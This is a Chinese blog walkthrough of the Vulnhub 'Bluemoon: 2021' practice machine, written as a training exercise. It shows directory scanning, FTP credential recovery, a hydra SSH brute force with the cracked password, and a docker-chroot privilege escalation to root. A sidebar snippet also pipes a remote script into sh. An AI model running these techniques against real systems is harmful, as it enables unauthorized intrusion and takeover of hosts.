看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021

已于 2023-10-26 18:00:42 修改
阅读量608 收藏 16
点赞数 20
分类专栏: 渗透测试 # Vulnhub靶场 文章标签: Vulnhub靶机 Bluemoon2021 sudo-docker提权 hydra爆破 信息收集
于 2023-10-26 16:04:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/134058545
版权

Vulnhub靶机Bluemoon: 2021渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:需要获得root权限找到flag

Difficulty:Easy (简单的)

Vulnhub靶机下载:

官网下载: https: //download.vulnhub.com/bluemoon/bluemoon.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用 VMware或者Oracle VM打开即可。

在这里插入图片描述

在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

在这里插入图片描述
渗透机:kali IP :172.20.10.5 靶机IP :172.20.10.9

使用命令:nmap -sS -sV -n -T4 -p- 172.20.10.9

在这里插入图片描述
开启了21,2280端口访问80使用工具:dirb,dirsearch,gobuster 扫到/hidden_text

进行访问,得到一个二维码 QR扫一下 得到账号密码:userftp/ftpp@ssword

gobuster dir -u http://172.20.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt   -x php,bak,txt,html,sql,zip,phtml,sh

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

②:FTP登入:

登入成功,后发现两个文件 get进行下载 一个是账号一个是密码文件 可以进行爆破!

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

③:暴力破解:

这里使用hydra 九头蛇进行爆破命令如下:

hydra -l robin -P p_lists.txt  ssh://172.20.10.9

在这里插入图片描述

④:SSH登入:

爆破得到SSH账号密码为:robin/k4rv3ndh4nh4ck3r尝试登入,登入成功!!

在这里插入图片描述
这里找到一个flag。

在这里插入图片描述

⑤:Sudo-docker提权:

老样子三件套whoami、id、uname -a 查看权限比较低 sudo -l 查看

发现jerry 用户的 /home/robin/project/feedback.sh文件 进行查看

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
sudo -u jerry /home/robin/project/feedback.sh 运行脚本得到shell 又找到个flag

python3 -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

GTFOBins:https://gtfobins.github.io/gtfobins/docker/

在这里插入图片描述

在这里插入图片描述

⑥:获取FLAG:

在这里插入图片描述
至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

1.信息收集dirb,dirsearch,gobuster,nikto 工具得使用
2.Sudo-docker提权 docker run -v /:/mnt --rm -it alpine chroot /mnt sh命令的使用
3.FTP下载、hydra爆破、SSH登入 渗透的流程思路

🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

落寞的魚丶
关注
  • 20
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 11
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulhub漏洞环境安装
我了解豹女就像农民伯伯了解大米
03-17 1903
配置apt install下载源(后可直接使用apt进行下载其他软件) sudo add-apt-repository ppa:costamagnagianfranco/ettercap-stable-backports sudo apt-get update一键安装docker: curl -s https://get.docker.com/ | sh安装pip apt install python3-pip 或curl -s https://bootstrap....
vulnhub dc1
qq_55992895的博客
07-06 845
下载地址1:https://www.vulnhub.com/entry/dc-1,292/下载地址2:https://pan.baidu.com/s/15CUDP2252c_1NFzMOWUKvQ 提取码: md7x打开靶机先用nmap 扫描nmap -sN -T4 192.168.167.0/24 因为局域网内开启的主机比较多扫出了很多IP粗略看一下,有一台开放端口比较多的IP:192.168.167.42nmap -sV 192.168.167.42开启了22 80 111端口也确定这就是靶机后开始
渗透测试学习之vulnhub系列靶机——DC2
最新发布
jingzhou_666的博客
06-11 1436
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用。
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2990
Vulnhub靶机渗透学习——DC-9
Kali搭建vulhub漏洞环境
zg_111的博客
03-22 2008
Kali搭建vulhub漏洞环境
这篇 玩转渗透测试靶机vulnhub——My File Server: 1
Aluxian_的博客
03-22 2862
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去渗透测试提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机的类型也是第一次做,比较简单。2.smb共享 smbmap枚举(工具得使用)ssh私钥登入3.脏牛提权提权希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
2020最新渗透测试靶机和工具及
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 9070
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
vmvare vulnhub靶机IP最终版
li1136594919的博客
06-06 358
注:我一般作这一步后会开启靶机,然后用kali ping靶机的IP,前提是你熟知自己局域网的IP分配情况,也可以使用kali的"-sn"扫描同网段IP看是否分配靶机IP。这里可以看到配置文件里的网卡名称是enp0s3,而ip a 是ens33,因此需要把配置文件里的网卡名称enp0s3改为ens33.vulnhub大多数靶机的发行版是debian和ubuntu(以我的经验来看,可能不对,其他的发行版也可以参考着操作),如果是Debian请查看2.1,Ubuntu请看2.2。1、虚拟机网络设置为NAT。
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 1010
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
vulnhub靶机渗透 Lupin-One
RestoreJustice的博客
03-19 171
下载地址:https://www.vulnhub.com/entry/empire-lupinone,750/​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。
VulnHub系列之靶机Me And My Girlfriend
qq_45212316的博客
12-02 929
这个靶场背景告诉我们有一对恋人,即 Alice 和 Bob,这对情侣原本很浪漫,但自从 Alice 在一家私人公司“Ceban Corp”工作后,Alice 对 Bob 的态度发生了一些变化,就像“ 隐藏”了什么,Bob 请求您帮助以获取 Alice隐藏的内容并获得对公司的全访问权限!由于是靶机环境,目标主机与本地在同一网段,使用nmap进行网段扫描,探测存活主机,由结果判断192.168.87.169看起来像目标主机ip。打开我们的Kali,查看kali的ip地址,为192.168.87.170。
Vulnhub之BlueSmoke
CySeker's Blog
04-15 373
这个靶机的难度,作者定义为Medium。总之对于新手来说确实不简单,这个过程中,我仅仅成了80端口的探测,上传tar包,获得反弹shell后,配置ssh免密登录,使用find提权,搜集到关键信息。tar通配符命令执行漏洞,探查ssh私钥,查看find提权后的id,如何访问8787端口,再到ssti和解密conf二进制文件,都是跟着大佬的帖子来的。tar 通配符命令执行漏洞,可用于提权,再使用 john 进行字典爆破,有效用户组egid,egroups。
vulnhub靶机——raven: 2
09-03
你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* [vulnhub靶机raven2]...
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值